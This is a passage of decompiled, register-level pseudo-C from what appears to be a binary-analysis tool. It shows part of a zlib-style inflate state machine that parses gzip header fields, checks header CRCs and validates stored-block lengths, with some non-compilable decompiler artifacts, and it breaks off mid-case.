                                                                                                                                                  										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  										 *(__ebp - 0xc) = __edx;
                                                                                                                                                  										 *(__ebp - 8) = __eax;
                                                                                                                                                  										__eflags = __edi - 0x10;
                                                                                                                                                  										if(__edi < 0x10) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L52;
                                                                                                                                                  									}
                                                                                                                                                  									goto L322;
                                                                                                                                                  								case 4:
                                                                                                                                                  									L57:
                                                                                                                                                  									__eflags = __ebx[4] & 0x00000400;
                                                                                                                                                  									if((__ebx[4] & 0x00000400) == 0) {
                                                                                                                                                  										L67:
                                                                                                                                                  										__eax = __ebx[8];
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											_t136 = __eax + 0x10;
                                                                                                                                                  											 *_t136 =  *(__eax + 0x10) & 0x00000000;
                                                                                                                                                  											__eflags =  *_t136;
                                                                                                                                                  										}
                                                                                                                                                  										L69:
                                                                                                                                                  										 *__ebx = 5;
                                                                                                                                                  										goto L70;
                                                                                                                                                  									}
                                                                                                                                                  									L58:
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L62:
                                                                                                                                                  										__eax = __ebx[8];
                                                                                                                                                  										__ebx[0x10] = __edx;
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 0x14) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                  											 *(__ebp - 0x14) = __dl;
                                                                                                                                                  											__eax = __ebp - 0x14;
                                                                                                                                                  											__eflags = __edx;
                                                                                                                                                  											 *(__ebp - 0x13) = __dl;
                                                                                                                                                  											__ebx[6] = E000D30C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                                                                  										}
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										 *(__ebp - 0xc) = 0;
                                                                                                                                                  										 *(__ebp - 0x10) = 0;
                                                                                                                                                  										goto L69;
                                                                                                                                                  									}
                                                                                                                                                  									L59:
                                                                                                                                                  									__eax =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L60:
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L322;
                                                                                                                                                  										}
                                                                                                                                                  										L61:
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										 *(__ebp - 4) = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  										 *(__ebp - 0xc) = __edx;
                                                                                                                                                  										 *(__ebp - 8) = __eax;
                                                                                                                                                  										__eflags = __edi - 0x10;
                                                                                                                                                  										if(__edi < 0x10) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L62;
                                                                                                                                                  									}
                                                                                                                                                  									goto L322;
                                                                                                                                                  								case 5:
                                                                                                                                                  									L70:
                                                                                                                                                  									__eflags = __ebx[4] & 0x00000400;
                                                                                                                                                  									if((__ebx[4] & 0x00000400) == 0) {
                                                                                                                                                  										L83:
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										L84:
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__ebx[0x10] = __edx;
                                                                                                                                                  										 *__ebx = 6;
                                                                                                                                                  										goto L86;
                                                                                                                                                  									}
                                                                                                                                                  									L71:
                                                                                                                                                  									__ecx = __ebx[0x10];
                                                                                                                                                  									__edx =  *(__ebp - 4);
                                                                                                                                                  									__eflags = __ecx - __edx;
                                                                                                                                                  									__ecx =  >  ? __edx : __ecx;
                                                                                                                                                  									 *(__ebp - 0x30) = __ecx;
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx != 0) {
                                                                                                                                                  										__edx = __ebx[8];
                                                                                                                                                  										__eflags = __edx;
                                                                                                                                                  										if(__edx != 0) {
                                                                                                                                                  											__eax =  *(__edx + 0x10);
                                                                                                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                  												__eax =  *(__edx + 0x14);
                                                                                                                                                  												__eax =  *(__edx + 0x14) - __ebx[0x10];
                                                                                                                                                  												__edx =  *(__edx + 0x18);
                                                                                                                                                  												 *(__ebp - 0x34) = __eax;
                                                                                                                                                  												__eflags = __eax - __edx;
                                                                                                                                                  												__eax =  *(__ebp - 0x34);
                                                                                                                                                  												if(__eflags <= 0) {
                                                                                                                                                  													__edx = __ecx;
                                                                                                                                                  												} else {
                                                                                                                                                  													__edx = __edx - __eax;
                                                                                                                                                  												}
                                                                                                                                                  												__ecx =  *(__ebp - 8);
                                                                                                                                                  												__eax = __eax +  *(__ebp - 0x2c);
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												__eax = memcpy(__eax,  *(__ebp - 8), __edx);
                                                                                                                                                  												__ecx =  *(__ebp - 0x30);
                                                                                                                                                  												__esp = __esp + 0xc;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                  											__ebx[6] = E000D30C1(__ebx[6],  *(__ebp - 8), __ecx);
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *(__ebp - 0x30);
                                                                                                                                                  										 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                                                                                                                  										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                  										_t166 =  &(__ebx[0x10]);
                                                                                                                                                  										 *_t166 = __ebx[0x10] - __eax;
                                                                                                                                                  										__eflags =  *_t166;
                                                                                                                                                  									}
                                                                                                                                                  									__edx = 0;
                                                                                                                                                  									__eflags = __ebx[0x10];
                                                                                                                                                  									if(__ebx[0x10] != 0) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									} else {
                                                                                                                                                  										L82:
                                                                                                                                                  										goto L84;
                                                                                                                                                  									}
                                                                                                                                                  								case 6:
                                                                                                                                                  									L85:
                                                                                                                                                  									__edx = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									L86:
                                                                                                                                                  									__eflags = __ebx[4] & 0x00000800;
                                                                                                                                                  									if((__ebx[4] & 0x00000800) == 0) {
                                                                                                                                                  										L100:
                                                                                                                                                  										__eax = __ebx[8];
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 0x1c) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										L102:
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 7;
                                                                                                                                                  										__ebx[0x10] = 0;
                                                                                                                                                  										goto L104;
                                                                                                                                                  									}
                                                                                                                                                  									L87:
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx == 0) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									L88:
                                                                                                                                                  									__esi =  *(__ebp - 4);
                                                                                                                                                  									__eax = __edx;
                                                                                                                                                  									__edx =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L89:
                                                                                                                                                  										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                  										__eax = __eax + 1;
                                                                                                                                                  										 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                  										__ecx = __ebx[8];
                                                                                                                                                  										 *(__ebp - 0x34) = __eax;
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											__edx =  *(__ecx + 0x1c);
                                                                                                                                                  											__eflags =  *(__ecx + 0x1c);
                                                                                                                                                  											if( *(__ecx + 0x1c) != 0) {
                                                                                                                                                  												__edx = __ebx[0x10];
                                                                                                                                                  												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                  												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                  													__ecx =  *(__ecx + 0x1c);
                                                                                                                                                  													__eax =  *(__ebp - 0x2c);
                                                                                                                                                  													 *(__ecx + __edx) = __al;
                                                                                                                                                  													_t186 =  &(__ebx[0x10]);
                                                                                                                                                  													 *_t186 = __ebx[0x10] + 1;
                                                                                                                                                  													__eflags =  *_t186;
                                                                                                                                                  													__eax =  *(__ebp - 0x34);
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											__edx =  *(__ebp - 8);
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                  										if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										L95:
                                                                                                                                                  										__eflags = __eax - __esi;
                                                                                                                                                  										if(__eax < __esi) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									L96:
                                                                                                                                                  									__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  									__esi =  *(__ebp + 8);
                                                                                                                                                  									if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                  										__ebx[6] = __eax;
                                                                                                                                                  										__eax =  *(__ebp - 0x34);
                                                                                                                                                  									}
                                                                                                                                                  									__ecx =  *(__ebp - 4);
                                                                                                                                                  									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                  									__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                  									__eflags =  *(__ebp - 0x2c);
                                                                                                                                                  									 *(__ebp - 4) = __ecx;
                                                                                                                                                  									if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									} else {
                                                                                                                                                  										L99:
                                                                                                                                                  										goto L102;
                                                                                                                                                  									}
                                                                                                                                                  								case 7:
                                                                                                                                                  									L103:
                                                                                                                                                  									__edx = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									L104:
                                                                                                                                                  									__eflags = __ebx[4] & 0x00001000;
                                                                                                                                                  									if((__ebx[4] & 0x00001000) == 0) {
                                                                                                                                                  										L118:
                                                                                                                                                  										__eax = __ebx[8];
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 0x24) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										L120:
                                                                                                                                                  										__edx =  *(__ebp - 0xc);
                                                                                                                                                  										 *__ebx = 8;
                                                                                                                                                  										goto L121;
                                                                                                                                                  									}
                                                                                                                                                  									L105:
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx == 0) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									L106:
                                                                                                                                                  									__esi =  *(__ebp - 4);
                                                                                                                                                  									__eax = __edx;
                                                                                                                                                  									__edx =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L107:
                                                                                                                                                  										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                  										__eax = __eax + 1;
                                                                                                                                                  										 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                  										__ecx = __ebx[8];
                                                                                                                                                  										 *(__ebp - 0x34) = __eax;
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											__edx =  *(__ecx + 0x24);
                                                                                                                                                  											__eflags =  *(__ecx + 0x24);
                                                                                                                                                  											if( *(__ecx + 0x24) != 0) {
                                                                                                                                                  												__edx = __ebx[0x10];
                                                                                                                                                  												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                                                                  												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                                                                  													__ecx =  *(__ecx + 0x24);
                                                                                                                                                  													__eax =  *(__ebp - 0x2c);
                                                                                                                                                  													 *(__ecx + __edx) = __al;
                                                                                                                                                  													_t221 =  &(__ebx[0x10]);
                                                                                                                                                  													 *_t221 = __ebx[0x10] + 1;
                                                                                                                                                  													__eflags =  *_t221;
                                                                                                                                                  													__eax =  *(__ebp - 0x34);
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											__edx =  *(__ebp - 8);
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                  										if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										L113:
                                                                                                                                                  										__eflags = __eax - __esi;
                                                                                                                                                  										if(__eax < __esi) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									L114:
                                                                                                                                                  									__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  									__esi =  *(__ebp + 8);
                                                                                                                                                  									if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                  										__ebx[6] = __eax;
                                                                                                                                                  										__eax =  *(__ebp - 0x34);
                                                                                                                                                  									}
                                                                                                                                                  									__ecx =  *(__ebp - 4);
                                                                                                                                                  									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                  									__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                  									__eflags =  *(__ebp - 0x2c);
                                                                                                                                                  									 *(__ebp - 4) = __ecx;
                                                                                                                                                  									if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									} else {
                                                                                                                                                  										L117:
                                                                                                                                                  										goto L120;
                                                                                                                                                  									}
                                                                                                                                                  								case 8:
                                                                                                                                                  									L121:
                                                                                                                                                  									__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  									if((__ebx[4] & 0x00000200) == 0) {
                                                                                                                                                  										L129:
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										L130:
                                                                                                                                                  										__ecx = __ebx[8];
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											__ebx[4] = __ebx[4] >> 9;
                                                                                                                                                  											__eax = __ebx[4] >> 0x00000009 & 0x00000001;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											 *(__ecx + 0x2c) = __eax;
                                                                                                                                                  											__eax = __ebx[8];
                                                                                                                                                  											 *(__ebx[8] + 0x30) = 1;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = E000D30C1(__edx, __edx, __edx);
                                                                                                                                                  										__ebx[6] = __eax;
                                                                                                                                                  										 *(__esi + 0x30) = __eax;
                                                                                                                                                  										 *__ebx = 0xb;
                                                                                                                                                  										goto L133;
                                                                                                                                                  									}
                                                                                                                                                  									L122:
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L126:
                                                                                                                                                  										__eax = __ebx[6] & 0x0000ffff;
                                                                                                                                                  										__eflags = __edx - (__ebx[6] & 0x0000ffff);
                                                                                                                                                  										if(__edx == (__ebx[6] & 0x0000ffff)) {
                                                                                                                                                  											L128:
                                                                                                                                                  											__edx = 0;
                                                                                                                                                  											__edi = 0;
                                                                                                                                                  											 *(__ebp - 0xc) = 0;
                                                                                                                                                  											 *(__ebp - 0x10) = 0;
                                                                                                                                                  											goto L130;
                                                                                                                                                  										}
                                                                                                                                                  										L127:
                                                                                                                                                  										 *(__esi + 0x18) = "header crc mismatch";
                                                                                                                                                  										goto L17;
                                                                                                                                                  									}
                                                                                                                                                  									L123:
                                                                                                                                                  									__eax =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L124:
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L322;
                                                                                                                                                  										}
                                                                                                                                                  										L125:
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										 *(__ebp - 4) = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  										 *(__ebp - 0xc) = __edx;
                                                                                                                                                  										 *(__ebp - 8) = __eax;
                                                                                                                                                  										 *(__ebp - 0x10) = __edi;
                                                                                                                                                  										__eflags = __edi - 0x10;
                                                                                                                                                  										if(__edi < 0x10) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L126;
                                                                                                                                                  									}
                                                                                                                                                  									goto L322;
                                                                                                                                                  								case 9:
                                                                                                                                                  									L139:
                                                                                                                                                  									__eflags = __edi - 0x20;
                                                                                                                                                  									if(__edi >= 0x20) {
                                                                                                                                                  										L143:
                                                                                                                                                  										__ecx = __edx;
                                                                                                                                                  										__edi = 0xff00;
                                                                                                                                                  										__ecx = __edx & 0x0000ff00;
                                                                                                                                                  										__edx = __edx << 0x10;
                                                                                                                                                  										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                                                                  										__edx = __edx >> 8;
                                                                                                                                                  										__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                                                                  										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                                                                  										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                                                                  										__edx = __edx >> 0x18;
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__eax = __eax + __edx;
                                                                                                                                                  										__ebx[6] = __eax;
                                                                                                                                                  										 *(__esi + 0x30) = __eax;
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 0xa;
                                                                                                                                                  										 *(__ebp - 0xc) = 0;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										goto L145;
                                                                                                                                                  									}
                                                                                                                                                  									L140:
                                                                                                                                                  									__eax =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L141:
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L322;
                                                                                                                                                  										}
                                                                                                                                                  										L142:
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										 *(__ebp - 4) = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  										 *(__ebp - 0xc) = __edx;
                                                                                                                                                  										 *(__ebp - 8) = __eax;
                                                                                                                                                  										__eflags = __edi - 0x20;
                                                                                                                                                  										if(__edi < 0x20) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L143;
                                                                                                                                                  									}
                                                                                                                                                  									goto L322;
                                                                                                                                                  								case 0xa:
                                                                                                                                                  									L144:
                                                                                                                                                  									__eax = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									L145:
                                                                                                                                                  									__eflags = __ebx[3] - __eax;
                                                                                                                                                  									if(__ebx[3] == __eax) {
                                                                                                                                                  										L316:
                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                  										 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                                                                  										__eax =  *(__ebp - 0x18);
                                                                                                                                                  										 *(__esi + 0x10) =  *(__ebp - 0x18);
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										 *__esi =  *(__ebp - 8);
                                                                                                                                                  										 *(__esi + 4) = __ecx;
                                                                                                                                                  										__ebx[0xe] = __edx;
                                                                                                                                                  										__ebx[0xf] = __edi;
                                                                                                                                                  										_push(2);
                                                                                                                                                  										goto L137;
                                                                                                                                                  									}
                                                                                                                                                  									L146:
                                                                                                                                                  									__eax = E000D2E91(__eax, __eax, __eax);
                                                                                                                                                  									__edx =  *(__ebp - 0xc);
                                                                                                                                                  									__ecx =  *(__ebp - 4);
                                                                                                                                                  									__ebx[6] = __eax;
                                                                                                                                                  									 *(__esi + 0x30) = __eax;
                                                                                                                                                  									 *__ebx = 0xb;
                                                                                                                                                  									goto L147;
                                                                                                                                                  								case 0xb:
                                                                                                                                                  									L147:
                                                                                                                                                  									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
                                                                                                                                                  									if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									L148:
                                                                                                                                                  									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                  									if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									goto L149;
                                                                                                                                                  								case 0xc:
                                                                                                                                                  									L149:
                                                                                                                                                  									__eflags = __ebx[1];
                                                                                                                                                  									if(__ebx[1] == 0) {
                                                                                                                                                  										L151:
                                                                                                                                                  										__eflags = __edi - 3;
                                                                                                                                                  										if(__edi >= 3) {
                                                                                                                                                  											L155:
                                                                                                                                                  											__eax = __edx;
                                                                                                                                                  											__edx = __edx >> 1;
                                                                                                                                                  											__ebx[1] = __eax;
                                                                                                                                                  											__edx = __edx & 0x00000003;
                                                                                                                                                  											__eax = __edx & 0x00000003;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												L163:
                                                                                                                                                  												 *__ebx = 0xd;
                                                                                                                                                  												L164:
                                                                                                                                                  												__edx = __edx >> 2;
                                                                                                                                                  												__edi = __edi - 3;
                                                                                                                                                  												L21:
                                                                                                                                                  												 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  												 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  												goto L134;
                                                                                                                                                  											}
                                                                                                                                                  											L156:
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												L161:
                                                                                                                                                  												__eax = E000D1718(__ebx);
                                                                                                                                                  												 *__ebx = 0x13;
                                                                                                                                                  												__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                  												if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
                                                                                                                                                  													goto L164;
                                                                                                                                                  												}
                                                                                                                                                  												L162:
                                                                                                                                                  												__edx = __edx >> 2;
                                                                                                                                                  												__edi = __edi - 3;
                                                                                                                                                  												 *(__ebp - 0xc) = __edx;
                                                                                                                                                  												goto L322;
                                                                                                                                                  											}
                                                                                                                                                  											L157:
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												_push(0x10);
                                                                                                                                                  												_pop(__eax);
                                                                                                                                                  												 *__ebx = __eax;
                                                                                                                                                  											} else {
                                                                                                                                                  												__eax = __eax - 1;
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax == 0) {
                                                                                                                                                  													 *(__esi + 0x18) = "invalid block type";
                                                                                                                                                  													 *__ebx = 0x1d;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											goto L164;
                                                                                                                                                  										}
                                                                                                                                                  										L152:
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L153:
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											if(__ecx == 0) {
                                                                                                                                                  												goto L322;
                                                                                                                                                  											}
                                                                                                                                                  											L154:
                                                                                                                                                  											__eax =  *__eax & 0x000000ff;
                                                                                                                                                  											 *(__ebp - 4) = __ecx;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											__eax = __eax << __cl;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											__ecx =  *(__ebp - 4);
                                                                                                                                                  											__edx = __edx + __eax;
                                                                                                                                                  											__eax =  *(__ebp - 8);
                                                                                                                                                  											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  											 *(__ebp - 0xc) = __edx;
                                                                                                                                                  											 *(__ebp - 8) = __eax;
                                                                                                                                                  											__eflags = __edi - 3;
                                                                                                                                                  											if(__edi < 3) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L155;
                                                                                                                                                  										}
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  									L150:
                                                                                                                                                  									__ecx = __edi;
                                                                                                                                                  									 *__ebx = 0x1a;
                                                                                                                                                  									__ecx = __edi & 0x00000007;
                                                                                                                                                  									__edx = __edx >> __cl;
                                                                                                                                                  									__edi = __edi - __ecx;
                                                                                                                                                  									 *(__ebp - 0xc) = __edx;
                                                                                                                                                  									 *(__ebp - 0x10) = __edi;
                                                                                                                                                  									goto L134;
                                                                                                                                                  								case 0xd:
                                                                                                                                                  									L165:
                                                                                                                                                  									__edi = __edi & 0x00000007;
                                                                                                                                                  									__edi = __edi - (__edi & 0x00000007);
                                                                                                                                                  									__edx = __edx >> __cl;
                                                                                                                                                  									 *(__ebp - 0xc) = __edx;
                                                                                                                                                  									 *(__ebp - 0x10) = __edi;
                                                                                                                                                  									__eflags = __edi - 0x20;
                                                                                                                                                  									if(__edi >= 0x20) {
                                                                                                                                                  										L169:
                                                                                                                                                  										__eax = __edx;
                                                                                                                                                  										__ecx = __edx;
                                                                                                                                                  										__eax =  !__edx;
                                                                                                                                                  										__ecx = __edx & 0x0000ffff;
                                                                                                                                                  										__eax =  !__edx >> 0x10;
                                                                                                                                                  										__eflags = __ecx -  !__edx >> 0x10;
                                                                                                                                                  										if(__ecx ==  !__edx >> 0x10) {
                                                                                                                                                  											L171:
                                                                                                                                                  											__eax = 0;
                                                                                                                                                  											__ebx[0x10] = __ecx;
                                                                                                                                                  											__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                  											__edx = 0;
                                                                                                                                                  											__ecx =  *(__ebp - 4);
                                                                                                                                                  											__edi = 0;
                                                                                                                                                  											 *(__ebp - 0xc) = 0;
                                                                                                                                                  											 *(__ebp - 0x10) = 0;
                                                                                                                                                  											 *__ebx = 0xe;
                                                                                                                                                  											if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                  												goto L323;
                                                                                                                                                  											}
                                                                                                                                                  											goto L172;
                                                                                                                                                  										}
                                                                                                                                                  										L170:
                                                                                                                                                  										 *(__esi + 0x18) = "invalid stored block lengths";
                                                                                                                                                  										goto L17;
                                                                                                                                                  									}
                                                                                                                                                  									L166:
                                                                                                                                                  									__eax =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L167:
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L323;
                                                                                                                                                  										}
                                                                                                                                                  										L168:
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										 *(__ebp - 4) = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										 *(__ebp - 0x10) = __edi;
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  										 *(__ebp - 0xc) = __edx;
                                                                                                                                                  										 *(__ebp - 8) = __eax;
                                                                                                                                                  										__eflags = __edi - 0x20;
                                                                                                                                                  										if(__edi < 0x20) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L169;
                                                                                                                                                  									}
                                                                                                                                                  									goto L323;
                                                                                                                                                  								case 0xe:
                                                                                                                                                  									L172:
                                                                                                                                                  									 *__ebx = 0xf;
                                                                                                                                                  									goto L173;
                                                                                                                                                  								case 0xf:
                                                                                                                                                  									L173:
                                                                                                                                                  									__eax = __ebx[0x10];
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										L176:
                                                                                                                                                  										 *__ebx = 0xb;
                                                                                                                                                  										goto L135;
                                                                                                                                                  									}
                                                                                                                                                  									L174:
                                                                                                                                                  									__eflags = __eax - __ecx;
                                                                                                                                                  									__eax =  >  ? __ecx : __eax;
                                                                                                                                                  									__eflags = __eax -  *(__ebp - 0x18);
                                                                                                                                                  									__eax =  >  ?  *(__ebp - 0x18) : __eax;
